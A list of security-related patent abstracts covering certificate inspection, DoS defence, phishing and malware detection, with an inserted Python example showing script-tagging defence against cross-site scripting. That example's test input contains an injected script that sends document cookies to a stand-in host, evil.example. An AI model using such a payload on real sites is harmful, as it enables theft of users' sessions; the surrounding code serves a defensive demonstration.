20100186086 METHODS FOR INSPECTING SECURITY CERTIFICATES BY NETWORK SECURITY DEVICES TO DETECT AND PREVENT THE USE OF INVALID CERTIFICATES - Disclosed are methods and media for inspecting security certificates. Methods include the steps of: scanning, by a network security device, messages of a security protocol between a server and a client system; detecting the messages having a security certificate; detecting suspicious security certificates from the messages; and aborting particular sessions of the security protocol associated with the suspicious certificates. Preferably, the step of scanning is performed only on messages of server certificate records. Preferably, the method further includes the step of: sending an invalid-certificate notice to the server and the client system. Preferably, the step of detecting the suspicious certificates includes detecting a use of an incorrectly-generated private key for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting an unavailability of revocation information for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting a use of an invalid cryptographic algorithm for the certificates. 07-22-2010
20100175131 METHOD AND SYSTEM FOR NETWORK PROTECTION AGAINST CYBER ATTACKS - A method, system, and device for protecting networking computers or devices from cyber attacks, including periodically changing cyber coordinates of a communications network or system; communicating the changed cyber coordinates to corresponding or reciprocal networks and/or devices so they can maintain communications; detecting a cyber attack or receiving notification from the corresponding or reciprocal networks and/or devices of a cyber attack; and changing the cyber coordinates of the network or system upon such detection or notification and communicating the changed cyber coordinates to the corresponding or reciprocal networks and/or devices. 07-08-2010
20100175130 Pattern-Recognition Processor with Matching-Data Reporting Module - Disclosed are methods and devices, among which is a device that includes a pattern-recognition processor. The pattern-recognition processor may include a matching-data reporting module, which may have a buffer and a match event table. The buffer may be coupled to a data stream and configured to store at least part of the data stream, and the match event table may be configured to store data indicative of a buffer location corresponding with a start of a search criterion being satisfied. 07-08-2010
20100287613 SANITIZATION OF PACKETS - Methods, systems, and computer-readable media are disclosed for packet sanitization. A particular method intercepts a packet of a packet stream, where the packet stream is transmitted in accordance with a particular protocol. The packet is analyzed based on a specification associated with the particular protocol. Based on the analysis, a data value of a field of the packet is replaced with a sanitized data value to create a sanitized packet. The sanitized packet may be injected into the packet stream or may optionally be forwarded to a signature module that checks the sanitized packet for malicious content. When malicious content is found, the sanitized packet may be dropped, the sanitized packet may be logged, the sanitized packet may be redirected, or a notification regarding the sanitized packet may be sent to an administrator. 11-11-2010
20120174219 IDENTIFYING MOBILE DEVICE REPUTATIONS - Methods and systems for operation upon one or more data processors for assigning a reputation to a messaging entity by analyzing the attributes of the entity, correlating the attributes with known attributes to define relationships between entities sharing attributes, and attributing a portion of the reputation of one related entity to the reputation of the other related entity. 07-05-2012
20120174218 Network Communication System With Improved Security - A computer network communication method and system wherein software rendering software is interposed in the data communication path between a browser running on a user computer and the internet data sources (for example, internet-accessible server computers) that the user browser wants to receive information from. The software rendering application gets data from internet data sources, but this data may contain malware. To provide enhanced security, the software rendering application renders this data to form a new browser readable code set (for example, an xml page with CSS layers), and this new and safe browser readable code set is sent along to the browser on the user computer for appropriate presentation to the user. As part of the rendering process, dedicated and distinct virtual machines may be used to render certain portions of the data, such as executable code. These virtual machines may be watched, and quickly destroyed if it is detected that they have encountered some type of malware. 07-05-2012
20120174217 NETWORK SECURITY MANAGEMENT - A method may include receiving session control messages and counting the session control messages of a same type having a same transaction identifier (ID). The method may further include blocking the session control messages of the same type having the same transaction ID when the count exceeds a threshold number. The method may further include determining whether the blocked session control messages are associated with an anomalous event and, when the blocked session control messages are not associated with the anomalous event, increasing the threshold number. 07-05-2012
20120174216 SECURITY PROTOCOL PROCESSING FOR ANTI-REPLAY PROTECTION - Described embodiments provide a network processor that includes a security protocol processor to prevent replay attacks on the network processor. A memory stores security associations for anti-replay operations. A pre-fetch module retrieves an anti-replay window corresponding to a data stream of the network processor. The anti-replay window has a range of sequence numbers. When the network processor receives a data packet, the security hardware accelerator determines a value of the received sequence number with respect to minimum and maximum values of a sequence number range of the anti-replay window. Depending on the value, the data packet is either received or accepted. The anti-replay window might be updated to reflect the receipt of the most recent data packet. 07-05-2012
20120317642 Parallel Tracing Apparatus For Malicious Websites - An apparatus and system for scoring and grading websites and method of operation. An apparatus receives one or more Uniform Resource Identifiers (URI), requests and receives a resource such as a webpage, and observes the behaviors of a commercial browser operating within a commercial operating system over a multi-core processor having hardware containing virtualization extensions. The apparatus records and stores objects and packets captured while the browser is controlled by software received from a server accessed via the URI. 12-13-2012
20110191848 PREVENTING MALICIOUS JUST-IN-TIME SPRAYING ATTACKS - A method disclosed herein includes acts of receiving code at a Just-in-Time compiler executing in an application on a computing device and compiling the code to generate machine code and causing the machine code to be placed on at least one page that is accessible by at least one processor on the computing device, wherein the Just-in-Time compiler compiles the code utilizing at least one technique for preventing a Just-in-Time spraying attack. 08-04-2011
20110191847 ACTIVITY FILTERING BASED ON TRUST RATINGS OF NETWORK ENTITIES - The filtering of activities generated by nodes of a network while interacting with a device may be performed by evaluating the desirability of the activities (e.g., a spam or not-spam determination of email messages sent by the node) and assigning a trust rating to the node. However, nodes are often identified by network address, and an operator of a node sending undesirable activities may reassign the network address of the node in order to avoid heavy filtering. Instead, nodes may be identified as being controlled by a network entity (e.g., an autonomous system identified in a border gateway protocol routing table.) The network entity is assigned a network entity trust rating based on the trust ratings of the nodes controlled thereby, and an appropriate level of activity filtering based on the network entity trust rating may be selected for subsequent activities received from all nodes controlled by the network entity. 08-04-2011
20120222113Logical Partition Media Access Control Impostor Detector - Provided are techniques to enable a virtual input/output server (VIOS) to establish cryptographically secure signals with target LPARs to detect an impostor or spoofing LPAR. The secure signal, or “heartbeat,” may be configured as an Internet Key Exchange/Internet Protocol Security (IKE/IPSec) encapsulated packet (ESP) connection or tunnel. Within the tunnel, the VIOS pings each target LPAR and, if a heartbeat is interrupted, the VIOS makes a determination as to whether the tunnel is broken, the corresponding LPAR is down or a media access control (MAC) spoofing attack is occurring. The determination is made by sending a heartbeat that is designed to fail unless the heartbeat is received by a spoofing device.08-30-2012
20120222112INFORMATION TECHNOLOGY GOVERNANCE AND CONTROLS METHODS AND APPARATUSES - Embodiments of the present invention provide methods and systems for automated change audit of an enterprise's IT infrastructure, including independent detection of changes, reconciliation of detected changes and independent reporting, to effectuate a triad of controls on managing changes within the IT infrastructure, preventive controls, detective controls and corrective controls.08-30-2012
20120222111CLASSIFYING A MESSAGE BASED ON FRAUD INDICATORS - Systems, methods, and media for classifying messages are disclosed. A plurality of fraud indicators are identified in the message. A signature of the message is generated. The generated signature of the message is compared to a stored signature. The stored signature is based on a statistical analysis of fraud indicators in a second message associated with the stored signature. A determination as to whether the message is fraudulent is made based on the comparison. The message is processed based on the determination that the message is a fraudulent message.08-30-2012
20120216278METHOD AND SYSTEM FOR REAL TIME CLASSIFICATION OF EVENTS IN COMPUTER INTEGRITY SYSTEM - Method and system using a designated known secure computer for real time classification of change events in a computer integrity system are disclosed. In the embodiment of the invention, the known secure computer, having only inbound connection, is dedicated for providing permissible change events, which are compared with change events generated on client operational computers. An alert is generated when the change event at the client operational computer and the respective permissible change event provided by the known secure computer mismatch.08-23-2012
20100050258LIGHTWEIGHT PACKET-DROP DETECTION FOR AD HOC NETWORKS - In packet-drop attacks in ad hoc networks, a malicious network node chooses to selectively drop packets that are supposed to be forwarded, which results in adverse impact on application good-put and network stability. A method and system for detection of packet-drop attacks in ad hoc networks requires network nodes to report statistics on IP flow packets originated, received, or forwarded to neighbors. These statistics are analyzed and correlated to determine nodes suspected of dropping packets.02-25-2010
20100050257CONFIRMATION METHOD OF API BY THE INFORMATION AT CALL-STACK - The present invention relates to a method of verifying an API using information recorded in the call stack. In the API verification method, whether at least one application is executed is determined in a system in which the application is installed. An API function requested when the application is executed is hooked. Details of a call stack for the API function are output. A stack Database (DB), in which call stack details for various types of API functions required for operation of the application are stored, is searched for the output call stack details, and the output call stack details are checked.02-25-2010
20080216173Method and Apparatus for Auditing Network Security - In an apparatus for auditing security of a computer system, at least one secure application server is in communication with a global computer network. The secure application server is programmed to receive selectively security audit instruction data from a remote computer system via the global computer network. A plurality of scanning machines each are in communication with the global computer network and are programmed to execute selectively a security audit scan of the remote computer system via the global computer network. A central computer, having a memory, is configured as a database server and as a scheduler. The central computer is in communication with the secure application server and the scanning machines. The central computer is programmed to perform the following operations: evaluate a database to determine if a security audit scan is currently scheduled to be run for a user; determine which of the plurality of scanning machines is available to perform a security audit scan; copy scan-related information into a scanning machine determined to be available and instruct the scanning machine to begin the scan; and record the results of the scan in the memory.09-04-2008
20120180129SYSTEM AND METHOD FOR PREVENTING WEB FRAUDS COMMITTED USING CLIENT-SCRIPTING ATTACKS - A method for detecting and blocking Javascript hijacking attacks, comprising checking if an incoming request belongs to a valid session established between a client and a trusted server. When said incoming request does belong to a valid session, it is checked if a Referer header of said incoming request includes a valid domain name. The incoming request is marked as suspicious, when said incoming request does not include a valid domain name. It is checked if a respective response of said suspicious incoming request includes a script code. A preventive action responsive to a user input is taken when said respective response includes a script code.07-12-2012
20120180125METHOD AND SYSTEM FOR PREVENTING DOMAIN NAME SYSTEM CACHE POISONING ATTACKS - A method for preventing domain name system cache poisoning attacks comprises steps of inputting a domain name by an internet application program of an Internet communication device, determining in which area the Internet communication device is located, randomly selecting at least two domain name system resolvers of the area, retrieving at least one Internet protocol address from the domain name system resolvers and evaluating the Internet protocol addresses to generate at least one security score, selecting a trustworthy Internet protocol address based on the security scores, comparing the security score of the selected Internet protocol address with a predetermined security score threshold, and sending the trustworthy Internet protocol address to the Internet application program of the Internet communication device when the security score is greater than the security score threshold. A system for preventing domain name system cache poisoning attacks comprises an Internet communication device and an optional proxy server.07-12-2012
20120180124AUTHENTICATION RISK EVALUATION - A computer is configured to receive an authentication request that identifies one or more authentication form factors, and for each form factor identified, further identifies at least one parameter. The computer is further configured to generate a risk score for the authentication request using the parameter, the risk score being based at least in part on a complexity associated with each of the one or more authentication form factors. The computer is further configured to provide the risk score to a requester.07-12-2012
20130174254METHOD FOR ADMINISTERING A TOP-LEVEL DOMAIN - A method for administering a top-level domain by analyzing domain name registrations for requests for suspicious or malicious domain names. A request to register a domain name is received. The requested domain name's information may be stored in a registry database. The requested domain name may also be conditionally stored in the domain name system (DNS) zone. The requested domain name is compared to a list of botnet domain names stored in a watch list database. If the requested domain name corresponds to one of the botnet domain names, the requested domain name is prevented from being added to the DNS zone or is removed from the DNS zone, if it has already been stored there. The information regarding the requested domain name is stored in the registry database, even if the domain name does not ultimately stay in the DNS zone.07-04-2013
20130174253SYSTEMS AND METHODS FOR DETECTING SIMILARITIES IN NETWORK TRAFFIC - A system, computer-readable medium, and method for identifying similarities in network traffic are provided. Hash values are calculated from Internet Protocol (IP) addresses in a group of IP addresses that request a domain name, a hash signature is generated from the hash values and paired with the domain name, and the domain name is then clustered with another domain name having a paired hash of the same value. The clustered domain names are then extracted and used in a similarity calculation.07-04-2013
20130174255APPARATUS METHOD AND MEDIUM FOR TRACING THE ORIGIN OF NETWORK TRANSMISSIONS USING N-GRAM DISTRIBUTION OF DATA - A method, apparatus, and medium are provided for tracing the origin of network transmissions. Connection records are maintained at computer system for storing source and destination addresses. The connection records also maintain a statistical distribution of data corresponding to the data payload being transmitted. The statistical distribution can be compared to that of the connection records in order to identify the sender. The location of the sender can subsequently be determined from the source address stored in the connection record. The process can be repeated multiple times until the location of the original sender has been traced.07-04-2013
20120233692APPARATUS AND METHOD FOR DETECTING MALICIOUS SITES - The invention relates to an apparatus for detecting malicious sites, comprising: a monitoring unit for monitoring all processes being executed in a computing apparatus; a hook code insertion unit for inserting a hook code in a process executed in a browser when the execution of the browser is detected by the monitoring unit; a danger level determining unit that, upon the detection of a website movement, uses the hook code to inspect a stack structure of a process implemented according to the website movement and determine whether or not to perform the stack structure inspection, and determines whether or not the website to which the movement has been made is a malicious site; and a database for storing a list of sites determined to be malicious.09-13-2012
20100037315TAMPER-AWARE VIRTUAL TPM - Methods, software/firmware and apparatus for implementing a tamper-aware virtual trusted platform module (TPM). Under the method, respective threads comprising a virtual TPM thread and a security-patrol thread are executed on a host processor. In one embodiment, the host processor is a multi-threaded processor having multiple logical processors, and the respective threads are executed on different logical processors. While the virtual TPM thread is used to perform various TPM functions, the security-patrol thread monitors for physical attacks on the processor by implementing various numerical calculation loops, wherein an erroneous calculation is indicative of a physical attack. In response to detection of such an attack, various actions can be taken in view of one or more predefined security policies, such as logging the event, shutting down the platform and/or informing a remote management entity.02-11-2010
20090064324NON-INTRUSIVE MONITORING OF SERVICES IN A SERVICE-ORIENTED ARCHITECTURE - A method for monitoring a service provided in a service-oriented architecture may include submitting a subscription request to a plurality of intermediaries in the service-oriented architecture from which to receive monitored data related to the service and determining which ones of the plurality of intermediaries to rely upon for monitoring the service. The method may also include receiving the monitored data from the determined ones of the plurality of intermediaries and presenting the monitored data for monitoring the service.03-05-2009
20090064325PHISHING NOTIFICATION SERVICE - A method includes determining whether new phishing site identifiers (URLs and/or IP addresses) have been created. Upon a determination that the new phishing site identifiers have been created, the new phishing site identifiers are compared to site identifiers of sites to which critical values have been provided in the past. Upon a determination that at least one of the new phishing site identifiers matches at least one of the site identifiers, a phishing notification is provided that the user was successfully phished in the past.03-05-2009
20120185937SYSTEM AND METHOD FOR SELECTIVELY STORING WEB OBJECTS IN A CACHE MEMORY BASED ON POLICY DECISIONS - A system and method for selectively storing one or more web objects in a memory is disclosed. A server response is received at a network traffic management device, wherein the server response is associated with a client request sent from a client device and includes at least one web object. The server response is analyzed using a security module of the network traffic management device which determines if the at least a portion of the server response contains suspicious content in relation to one or more defined policy parameters handled by the security module. An instruction is sent from the security module to a cache module of the network traffic management device upon determining that the at least a portion of the server response contains suspicious information, wherein the cache module does not store the at least one web object upon receiving the instruction.07-19-2012
20120185936Systems and Methods for Detecting Fraud Associated with Systems Application Processing - Systems and methods for detecting fraud associated with systems application processing are provided. An example method may include: for each of at least a subset of multiple application services, receiving an audit log message indicating a respective point in an execution path associated with execution of the application services; and prior to executing an application service endpoint of the application services, analyzing the received audit log messages to determine whether the execution path satisfies at least one predefined expected execution path.07-19-2012
20120084858SYSTEM AND METHOD FOR DETECTION OF ABERRANT NETWORK BEHAVIOR BY CLIENTS OF A NETWORK ACCESS GATEWAY - Embodiments of systems and methods for detecting aberrant network behavior are disclosed. One embodiment comprises a network interface over which network communications are received from a client. These network communications can then be analyzed to determine if aberrant network behavior is occurring with respect to the client.04-05-2012
20120084857DEVICE SECURITY SYSTEM - A computer-implemented method may include identifying a security event condition associated with a device. One or more security rules may be identified for execution based on the device and the identified security event condition, wherein the one or more security rules define security related actions to be performed upon occurrence of the security event condition. The security related actions may be initiated by at least one processor on the device to secure the device from unauthorized use.04-05-2012
20120185935IMPLEMENTING AUTOMATIC ACCESS CONTROL LIST VALIDATION USING AUTOMATIC CATEGORIZATION OF UNSTRUCTURED TEXT - A method, system and computer program product are provided for implementing automatic access control list validation using automatic categorization of unstructured text. Automatic categorization of unstructured text is performed on a plurality of documents of an access control list for determining an average term vector. Each of the documents is scored against the average term vector to identify a dissimilar document, flagged as a possible security risk. Automatic categorization of unstructured text is performed on user information of a plurality of members of a candidate access control list for determining a typical term vector. A similarity score is determined from the user information and the typical term vector, and members of an access control list that are dissimilar from other members of the access control list are identified.07-19-2012
20120227106SYSTEM AND METHOD FOR PREVENTING WEB FRAUDS COMMITTED USING CLIENT-SCRIPTING ATTACKS - A method for detecting and blocking Javascript hijacking attacks, comprising checking if an incoming request belongs to a valid session established between a client and a trusted server. When said incoming request does belong to a valid session, it is checked if a Referer header of said incoming request includes a valid domain name. The incoming request is marked as suspicious, when said incoming request does not include a valid domain name. It is checked if a respective response of said suspicious incoming request includes a script code. A preventive action responsive to a user input is taken when said respective response includes a script code.09-06-2012
20120227105METHOD AND APPARATUS FOR DETECTING MALICIOUS SOFTWARE USING MACHINE LEARNING TECHNIQUES - Novel methods, components, and systems for detecting malicious software in a proactive manner are presented. More specifically, we describe methods, components, and systems that leverage machine learning techniques to detect malicious software. The disclosed invention provides a significant improvement with regard to detection capabilities compared to previous approaches.09-06-2012
20120227104SYSTEMS AND METHODS FOR DETECTING EMAIL SPAM AND VARIANTS THEREOF - The present disclosure provides systems and methods for detecting email spam and variants thereof. The systems and methods are configured to detect spam messages and variations thereof for different senders and with slight differences within the message body. In an exemplary embodiment, an incoming message body (m) is converted to a sequence of successive word lengths (S09-06-2012
20120260336NETWORK ACCOUNTABILITY AMONG AUTONOMOUS SYSTEMS - In one kind of DoS attack, malicious customers may try to send a large number of filter requests against an innocent customer. In one implementation, a Filter Request Server (FRS) may allow a customer against whom a filter request is made to dispute the implicit accusation of the filter request or stop sending malicious traffic. If the customer claims innocence, the FRS may log destination addresses of data packets sent by the customer and identify and ignore false filter requests if these filter requests come from customers who do not correspond to one or more of the destination addresses that have previously been logged by the FRS.10-11-2012
20120260335FRONT-END PROTOCOL FOR SERVER PROTECTION - The present invention provides for protecting against denial of service attacks. A request is sent by a client, the request comprises client indicia. The request is received at a server. A request count is incremented by the server. A sequence number is assigned as a function of the client indicia. A problem is selected by the server. The problem is sent by the server to the client. A solution to the problem is sent to the server. It is determined if the solution by client is correct. If the solution is correct, a session is performed. If the solution is not correct, the request is discarded. This can substantially decrease the amount of attacks performed by a rogue client, as the session set-up time can be substantial.10-11-2012
20120260337System and Method for Avoiding and Mitigating a DDoS Attack - Described is a system and method for receiving a data packet including a destination address and a source address, categorizing the data packet into a community based on the source address, wherein the community is predefined by a user corresponding to the destination address and selecting a treatment for the data packet based on the community. The method may be implemented on a router to avoid and/or mitigate the harmful effects of a Distributed Denial of Service (“DDoS”) attack on a computer system or network.10-11-2012
20090019544Ensuring Security of Connection Between Thin Client and Client Blade - A method and system for ensuring security and preventing intrusion in a connection between a thin client and a client blade. An encrypted keep-alive protocol is conducted between the client blade and the thin client. The client blade issues keep-alive protocol messages and monitors for keep-alive protocol acknowledgments from the thin client. If a failure in receiving a keep-alive protocol acknowledgment from the thin client is detected and the failure is not due to a momentary glitch in the keep-alive protocol, then a command is generated to enter the client blade in a particular state (e.g., a hard power off state). The command is based on a “privilege mask” which includes code that specifies an action to be performed (i.e., enter a particular state) by the client blade. Based on the action performed by the client blade, the client blade provides different levels of security or protection against intrusion.01-15-2009
20080301807System and Method for Controlling On-Demand Security - An on-demand security service ensures isolation of the service provider's customers where the customers share resources at the system, subsystem, and storage level. The security service is provided in a pre-production phase and in a post-production phase. The pre-production phase takes place prior to boarding the customer. In the pre-production phase the resources to be protected are defined in a security guide, and using the security guide, physical segregation at the facility, network, and technical and delivery support levels is planned and then implemented. In the post-production phase, ongoing activities are proactive and reactive. Proactive activities include maintaining physical segregation by reviewing and updating the security guide, and testing physical segregation by performing security audits and penetration tests. Observations and findings of the audits and penetration tests are resolved. Reactive activities include identifying isolation failures, coordinating appropriate actions, and resolving the isolation failure. The service may be embodied in a system and in a computer implemented process comprising a security guide file (SGF), a security guide application (SGA), a security implementation application (SIA), a security validation application (SVA), and an event coordination application (ECA).12-04-2008
20080301806DISTRIBUTED COMPUTATION IN UNTRUSTED COMPUTING ENVIRONMENTS USING DISTRACTIVE COMPUTATIONAL UNITS - An apparatus, program product and method initiate the execution of distractive computational units along with the execution of other computational units on an untrusted computer to inhibit the reconstitution of a computation by an untrusted party. In particular, along with partitioning a particular computation into a plurality of computational units, one or more distractive computational units are generated and supplied to one or more resource providers for execution along with those of the partitioned computation.12-04-2008
20120266241Communications system having security apparatus, security apparatus and method herefor - The present invention relates to a communications system having at least one communications means by means of which the communications system can be connected to at least one further processing unit and/or to a further communications system, having at least one first memory means, having at least one second memory means and having at least one security apparatus, wherein identical information is stored on the first and second memory means and wherein damage to the communications system can be determined with reference to a comparison of this information by means of the security apparatus. The present invention furthermore relates to a security apparatus and to a method of determining damage to a communications system.10-18-2012
20120266240Method and apparatus for filtering malicious call completion indicator and calling-side network device - A method for filtering a malicious call completion indicator in a CCBS service is provided, in which a calling-side network device rejects the current call request, or removes the call completion indicator information from the call request and then forwards the call request, when determining that the call request carries the information. The disclosure also provides a corresponding apparatus, which includes a reception unit configured to receive a call request, a detection unit configured to detect the call request and to trigger the rejection unit when determining that the call request carries call completion indicator information, and a rejection unit configured to reject the current call request. A calling-side network device is also provided. According to the disclosure, the sequence for accessing the calls from calling subscribers to a called subscriber is well kept, thus assuring fairness of the call access and avoiding preferential call access of malicious subscribers.10-18-2012
20120240227METHODS AND APPARATUS FOR CONDUCTING ELECTRONIC TRANSACTIONS - A system and method for conducting electronic commerce are disclosed. In various embodiments, the electronic transaction is a purchase transaction. A user is provided with an intelligent token, such as a smartcard containing a digital certificate. The intelligent token suitably authenticates with a server on a network that conducts all or portions of the transaction on behalf of the user. In various embodiments a wallet server interacts with a security server to provide enhanced reliability and confidence in the transaction. In various embodiments, the wallet server includes a toolbar. In various embodiments, the digital wallet pre-fills forms. Forms may be pre-filled using an auto-remember component.09-20-2012
20110047617PROTECTING AGAINST NETWORK RESOURCES ASSOCIATED WITH UNDESIRABLE ACTIVITIES - Various embodiments provide protection against web resources associated with one or more undesirable activities. In at least some embodiments, a method detects and responds to a user-initiated activity on a computing device. Responding can include, by way of example and not limitation, checking locally, on the computing device, whether a web resource that is associated with the user-initiated activity has been identified as being associated with a safe site. Furthermore, in at least some embodiments, the method checks remotely, away from the computing device, whether the web resource is identified as being at least possibly associated with one or more undesirable activities.02-24-2011
20120324573METHOD FOR DETERMINING WHETHER OR NOT SPECIFIC NETWORK SESSION IS UNDER DENIAL-OF-SERVICE ATTACK AND METHOD FOR THE SAME - Provided is an apparatus and method for determining whether or not a specific network session is under a denial-of-service (DoS) attack. The method includes detecting a packet transmitted in the session, initializing the number of attack-suspicion continuation packets, increasing the number of attack-suspicion continuation packets by a predetermined number, and determining that the session is under the DoS attack.12-20-2012
20120324572SYSTEMS AND METHODS THAT PERFORM APPLICATION REQUEST THROTTLING IN A DISTRIBUTED COMPUTING ENVIRONMENT - Methods of managing network traffic in a distributed computing environment include segmenting a plurality of virtual hosts into sub-groups. A first security agent monitors first communications of virtual hosts within a first sub-group of virtual hosts, and a second security agent monitors second communications of virtual hosts within a second sub-group of virtual hosts. Information regarding the first communications and the second communications is collected from the security agents and analyzed to detect a denial of service attack. A defense mechanism is initiated in response to detecting the denial of service attack.12-20-2012
20120324574ENGINE, SYSTEM AND METHOD OF PROVIDING A DOMAIN SOCIAL NETWORK HAVING BUSINESS INTELLIGENCE LOGIC - An engine, system and method for a domain social network that interconnects Internet users with at least domains owned by or of interest to those Internet users, and that may obtain and/or forward obtained dynamic data regarding those domains automatically, such as by web service or email service. The dynamic data may be used to filter and protect content and data of the respective domains, to protect users by identifying low quality web pages or malicious software or pages, to isolate or improve search results regarding the domain, and/or to improve Internet-based transaction flow, such as the creation of advertising.12-20-2012
20110225652IDENTITY THEFT COUNTERMEASURES - In some embodiments, techniques for computer security comprise preventing and/or mitigating identity theft such as phishing.09-15-2011
20110239296TRACING UNAUTHORIZED USE OF SECURE MODULES - At least methods and systems for generating tracing data for tracing rogue secure modules in a population of secure modules are described wherein said rogue secure modules are configured for unauthorized provisioning of control words to a control word sharing network. One method comprises: executing a predetermined number of tracing experiments on said population, wherein each of said tracing experiments comprises: sending at least one tracing event message to each secure module in said selected population, wherein event information in said tracing event message is used to select at least part of said secure modules in said population to generate a tracing event; in response to the reception of said at least one tracing event message, a tracing event detector monitoring for a predetermined time the presence of at least one tracing event in said control word sharing network; and, storing tracing data in an event database, said tracing data comprising said event information and event detection information indicating whether or not a tracing event is detected.09-29-2011
20110239295METHOD FOR SUPPORTING ATTACK DETECTION IN A DISTRIBUTED SYSTEM - A method for supporting attack detection in a distributed system, wherein a message being sent within the distributed system from a source entity to one or more target entities is transmitted via one or more intermediate entities, and wherein at least one of the one or more intermediate entities—tagging entity—appends an attack information tag to the message indicating whether the message constitutes or is part of an attack, is characterized in that a reputation system is provided, the reputation system being configured to receive the attack information tag generated by the tagging entity, and to generate a rating of the attack information tag.09-29-2011
20120278884METHOD AND SYSTEM FOR PROCESSING A FILE TO IDENTIFY UNEXPECTED FILE TYPES - A method and system for testing a file (or packet) formed from a sequential series of information units, each information unit within a predetermined set of information units, e.g., each information unit may correspond to a character within the ASCII character set. An information unit-pair entropy density measurement is calculated for the received file using a probability matrix. The probability matrix tabulates the probabilities of occurrence for each possible sequential pair of information units of the predetermined set of information units. The computed information unit-pair entropy density measurement is compared with a threshold associated with an expected file type to determine whether the received file is of the expected file type or of an unexpected file type. The probability matrix may optionally be generated from the received file prior to calculating the density thereof. The probability matrix may optionally be predetermined based on the expected file type.11-01-2012
20120090027APPARATUS AND METHOD FOR DETECTING ABNORMAL HOST BASED ON SESSION MONITORING - An apparatus for detecting an abnormal host based on session monitoring includes: a host information collection unit for collecting information of processes being executed in hosts and information of sessions connected by the hosts; a network traffic monitoring unit for collecting network traffic information; an analysis unit for calculating an entropy of each host based on the collected session information to analyze correlation between hosts based on the calculated entropy and the network traffic information; and a detection unit for detecting an abnormal host and a process causing harmful traffic in the abnormal host based on the correlation and updating a black list based on the detected host and process.04-12-2012
20120090026CROSS-SITE SCRIPTING PREVENTION IN DYNAMIC CONTENT - Embodiments relate to systems, methods, and computer storage media for suppressing cross-site scripting in a content delivery system. A request is received for content that includes one or more scripted items. The scripted item is identified within the content. An identifier is associated with the scripted item when the scripted item is an intended scripted item to be associated with the content. The identifier may be a hash value computed by a hash function over the scripted item. Prior to communicating the content to a user, the scripted item is identified again to determine if an identifier is associated with the scripted item. If an identifier is associated with the scripted item, the identifier is evaluated to determine if the identifier is appropriate. When the identifier is determined to not be appropriate, the scripted item is prevented from being communicated to a user.04-12-2012
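An added example (not the patent's code) of the tag-then-filter flow above: every script in the trusted template is tagged with an identifier before user content is merged, and just before delivery any script whose identifier is missing or does not match is dropped. One deliberate departure from the abstract, stated as an assumption: the identifier is a keyed hash (HMAC under a pipeline secret) rather than a plain hash, because with a plain hash an attacker can tag their own injected script. The template, the user comment and the key are constructed for illustration.

```python
import hashlib
import hmac
import re

# Assumption (not from the page): identifiers are HMACs under a key known only
# to the content pipeline, so injected user content cannot carry a valid tag.
TAGGING_KEY = b"content-pipeline-key"
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SIG_ATTR_RE = re.compile(r'\sdata-sig="([0-9a-f]+)"')


def script_identifier(body: str, key: bytes = TAGGING_KEY) -> str:
    """Identifier for an intended scripted item: keyed hash over its body."""
    return hmac.new(key, body.strip().encode(), hashlib.sha256).hexdigest()[:32]


def tag_intended_scripts(template_html: str, key: bytes = TAGGING_KEY) -> str:
    """Run once over the trusted template, before user content is merged: every
    script present at this point is intended, so each receives its identifier."""
    def add_tag(m):
        attrs, body = m.group(1), m.group(2)
        return f'<script{attrs} data-sig="{script_identifier(body, key)}">{body}</script>'
    return SCRIPT_RE.sub(add_tag, template_html)


def filter_scripts(html: str, key: bytes = TAGGING_KEY):
    """Run just before delivery, after user content is merged: keep only scripts
    whose identifier is present and matches their body; drop everything else.
    Returns (filtered_html, list_of_dropped_script_bodies)."""
    dropped = []

    def check(m):
        attrs, body = m.group(1), m.group(2)
        sig = SIG_ATTR_RE.search(attrs)
        if sig and hmac.compare_digest(sig.group(1), script_identifier(body, key)):
            return m.group(0)
        dropped.append(body.strip())
        return ""
    return SCRIPT_RE.sub(check, html), dropped


# Constructed sample (not from the page): a template with one intended script
# and a comment slot, plus a user comment carrying an injected script and a
# copied-but-altered tagged script.
TEMPLATE = """<html><body>
<script>initWidgets();</script>
<div class="comment">{{comment}}</div>
</body></html>"""
USER_COMMENT = ('nice post <script>fetch("//evil.example/?c="+document.cookie)</script>'
                '<script data-sig="' + "0" * 32 + '">alert(1)</script>')


def render(template: str, comment: str):
    """Full pipeline: tag the template, merge user content, filter on the way out."""
    page = tag_intended_scripts(template).replace("{{comment}}", comment)
    return filter_scripts(page)


if __name__ == "__main__":
    html, dropped = render(TEMPLATE, USER_COMMENT)
    print(html)
    print("dropped:", dropped)
```

This covers `<script>` elements only; inline event handlers, `javascript:` URLs and similar vectors still need contextual output encoding of the user content itself.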
20120090025SYSTEMS AND METHODS FOR DETECTION OF MALICIOUS SOFTWARE PACKAGES - A software repository offering a software package or a computing system downloading a software package can utilize a security tool to verify the security of the software package. The security tool can check and verify that the software package is secure utilizing a black list of components. To check the security, the security tool can compare the components (archival files) of the software package to the black list. A black list can include a list of components that are known to be insecure.04-12-2012
20120331552MALWARE AUTOMATED REMOVAL SYSTEM AND METHOD - The present invention automates the operation of multiple malware removal software products using a computerized system that systematically operates the multiple selected software products. These products are operated in a customized “Safe Mode” using a shell that is different from the computer's other shell environments. Unlike the ordinary Safe Mode shells, the Custom Safe Mode prevents malware that ties itself to the normal shell, such as the Windows Explorer shell, from functioning. In addition, the Custom Safe Mode allows the automation of tasks beyond that which is available under the standard command line shell.12-27-2012
20120331551Detecting Phishing Attempt from Packets Marked by Network Nodes - A service is provided to an end-user of a first data communication device when receiving via a data network a plurality of data packets from a second data communication device. At least a particular data packet has been marked with node attribute data by one or more network nodes. The attribute data is indicative of a path of the data packet across the data network. An identifier, as declared by the second device is determined and correlated with one or more reference identifiers registered in advance. If there is a correlation, the node attribute data is correlated with reference attribute data registered in advance as associated with the reference identifier. If there is a discrepancy between the node attribute data and the reference attribute data, an alert is issued.12-27-2012
20120331550TRUSTED LANGUAGE RUNTIME ON A MOBILE PLATFORM - Disclosed is a trusted language runtime (TLR) architecture that provides abstractions for developing a runtime for executing trusted applications or portions thereof securely on a mobile device (e.g., a smartphone). TLR offers at least two abstractions to mobile developers: a trustbox and a trustlet. The trustbox is a runtime environment that offers code and data integrity, and confidentiality. Code and data running inside a trustbox cannot be read or modified by any code running outside the trustbox. A trustlet is the code portion of an application that runs inside a trustbox. With TLR, programmers can write applications in .NET and specify which parts of the application handle sensitive data, and thus, run inside the trustbox. With the TLR, the developer places these parts in a trustlet class, and the TLR provides all support needed to run the parts in the trustbox.12-27-2012
